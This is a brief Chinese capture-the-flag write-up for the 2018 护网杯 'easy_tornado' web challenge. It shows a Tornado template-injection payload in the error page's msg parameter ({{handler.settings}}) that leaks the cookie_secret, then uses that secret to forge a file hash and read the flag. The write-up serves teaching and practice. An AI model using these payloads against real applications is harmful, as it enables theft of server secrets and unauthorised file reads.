护网杯 2018
Web
easy_tornado
可以获得三个信息
flag in /fllllllllllllag
render
md5(cookie_secret+md5(filename))
/file?filename=/hints.txt&filehash=a80a87f16b53b615041eb1662300f6ff
结合题目可以发现是 SSTI 注入攻击,在 Error 页面发现了可注入变量 msg
http://e5f14720-a920-4249-b329-2b8a871f9a6d.node4.buuoj.cn:81/error?msg={{1}}
通过 msg 变量获取 tornado 模板的 cookie_secret 值,即构造 payload msg={{handler.settings}}
即可获得 cookie_secret 值 c5a970de-a479-405e-aad4-2f4212d9596c
之后通过编写 PHP 代码
即可获得 filehash 值 935bb7616e76314e48487e6e96a2a4ab
,通过构造 payload filename=/fllllllllllllag&filehash=935bb7616e76314e48487e6e96a2a4ab
即可获取到 flag
Last updated